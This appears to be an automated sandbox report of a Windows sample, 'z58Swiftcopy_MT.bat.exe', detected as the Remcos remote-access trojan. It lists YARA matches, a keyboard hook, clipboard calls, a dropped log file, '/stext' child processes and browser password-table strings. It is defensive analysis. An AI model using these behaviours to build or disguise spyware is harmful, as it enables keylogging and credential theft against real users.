                  Source: bhvD739.tmp.3.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregula
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownHTTPS traffic detected: 109.99.162.14:443 -> 192.168.11.20:49747 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Installs a global keyboard hook
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_004052FE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052FE
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,3_2_0040987A
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,3_2_004098E2
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,4_2_00406DFC
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_00406E9F
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,5_2_004068B5
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_004072B5

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 00000002.00000002.32056932719.0000000002AF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28436005878.0000000002AE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28485763517.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.32056784519.0000000002A77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.32066409158.0000000032B2F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.29410654098.0000000002A77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28486047899.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28453587511.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28390975053.0000000002A98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.29410560082.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: z58Swiftcopy_MT.bat.exe PID: 5524, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess Stats: CPU usage > 6%
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_00401806 NtdllDefWindowProc_W,3_2_00401806
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_004018C0 NtdllDefWindowProc_W,3_2_004018C0
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_004016FD NtdllDefWindowProc_A,4_2_004016FD
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_004017B7 NtdllDefWindowProc_A,4_2_004017B7
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_00402CAC NtdllDefWindowProc_A,5_2_00402CAC
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_00402D66 NtdllDefWindowProc_A,5_2_00402D66
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_0040330D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040330D
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeFile created: C:\Windows\resources\0409Jump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_004067250_2_00406725
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_00404B3D0_2_00404B3D
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A871942_2_33A87194
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A7B5C12_2_33A7B5C1
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A800002_2_33A80000
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_00406E8F3_2_00406E8F
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0044B0403_2_0044B040
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0043610D3_2_0043610D
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_004473103_2_00447310
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0044A4903_2_0044A490
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0040755A3_2_0040755A
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0043C5603_2_0043C560
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0044B6103_2_0044B610
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0044D6C03_2_0044D6C0
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_004476F03_2_004476F0
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0044B8703_2_0044B870
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0044081D3_2_0044081D
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_004149573_2_00414957
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_004079EE3_2_004079EE
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_00407AEB3_2_00407AEB
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0044AA803_2_0044AA80
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_00412AA93_2_00412AA9
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_00404B743_2_00404B74
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_00404B033_2_00404B03
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0044BBD83_2_0044BBD8
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_00404BE53_2_00404BE5
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_00404C763_2_00404C76
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_00415CFE3_2_00415CFE
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_00416D723_2_00416D72
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_00446D303_2_00446D30
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_00446D8B3_2_00446D8B
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_004050384_2_00405038
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_0041208C4_2_0041208C
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_004050A94_2_004050A9
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_0040511A4_2_0040511A
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_0043C13A4_2_0043C13A
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_004051AB4_2_004051AB
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_004493004_2_00449300
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_0040D3224_2_0040D322
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_0044A4F04_2_0044A4F0
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_0043A5AB4_2_0043A5AB
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_004136314_2_00413631
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_004466904_2_00446690
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_0044A7304_2_0044A730
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_004398D84_2_004398D8
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_004498E04_2_004498E0
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_0044A8864_2_0044A886
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_0043DA094_2_0043DA09
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_00438D5E4_2_00438D5E
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_00449ED04_2_00449ED0
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_0041FE834_2_0041FE83
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_00430F544_2_00430F54
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_004050C25_2_004050C2
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_004014AB5_2_004014AB
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_004051335_2_00405133
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_004051A45_2_004051A4
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_004012465_2_00401246
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_0040CA465_2_0040CA46
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_004052355_2_00405235
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_004032C85_2_004032C8
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_004222D95_2_004222D9
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_004016895_2_00401689
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_00402F605_2_00402F60
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: String function: 004169A7 appears 87 times
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: String function: 0044DB70 appears 41 times
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: String function: 004165FF appears 35 times
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: String function: 00422297 appears 42 times
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: String function: 00444B5A appears 37 times
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: String function: 00413025 appears 79 times
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: String function: 00416760 appears 69 times
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28485763517.0000000002AEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs z58Swiftcopy_MT.bat.exe
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28486179209.0000000002AF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs z58Swiftcopy_MT.bat.exe
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28486047899.0000000002AEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs z58Swiftcopy_MT.bat.exe
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28453587511.0000000002AE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs z58Swiftcopy_MT.bat.exe
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32067121242.0000000033A5B000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs z58Swiftcopy_MT.bat.exe
                  Source: z58Swiftcopy_MT.bat.exeBinary or memory string: OriginalFileName vs z58Swiftcopy_MT.bat.exe
                  Source: z58Swiftcopy_MT.bat.exeBinary or memory string: OriginalFilename vs z58Swiftcopy_MT.bat.exe
                  Source: z58Swiftcopy_MT.bat.exe, 00000005.00000002.28456405187.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs z58Swiftcopy_MT.bat.exe
                  Source: z58Swiftcopy_MT.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/12@3/3
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,3_2_004182CE
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_0040330D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040330D
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,5_2_00410DE1
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_004045CA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004045CA
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,3_2_00413D4C
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_004020CB CoCreateInstance,MultiByteToWideChar,0_2_004020CB
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,3_2_0040B58D
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernesJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeMutant created: \Sessions\1\BaseNamedObjects\wealthymannow-3N54OZ
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsm9316.tmpJump to behavior
                  Source: z58Swiftcopy_MT.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSystem information queried: HandleInformationJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: z58Swiftcopy_MT.bat.exe, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: z58Swiftcopy_MT.bat.exe, z58Swiftcopy_MT.bat.exe, 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32066847956.0000000033950000.00000040.10000000.00040000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: z58Swiftcopy_MT.bat.exe, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28479559586.0000000002A91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
                  Source: z58Swiftcopy_MT.bat.exe, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: z58Swiftcopy_MT.bat.exe, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28480507737.0000000002A91000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28482162830.0000000002A92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: z58Swiftcopy_MT.bat.exe, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478473558.0000000002A91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
                  Source: z58Swiftcopy_MT.bat.exeReversingLabs: Detection: 21%
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeFile read: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_4-33208
                  Source: unknownProcess created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\hqupnmxiqgofocirvgzrkof"
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\rsiinfhkeogkqiwvmrmsntajnt"
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\umntoxsdzwyxawszvchuyguswzwofs"
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\hqupnmxiqgofocirvgzrkof"Jump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\rsiinfhkeogkqiwvmrmsntajnt"Jump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\umntoxsdzwyxawszvchuyguswzwofs"Jump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: msi.dllJump to behavior
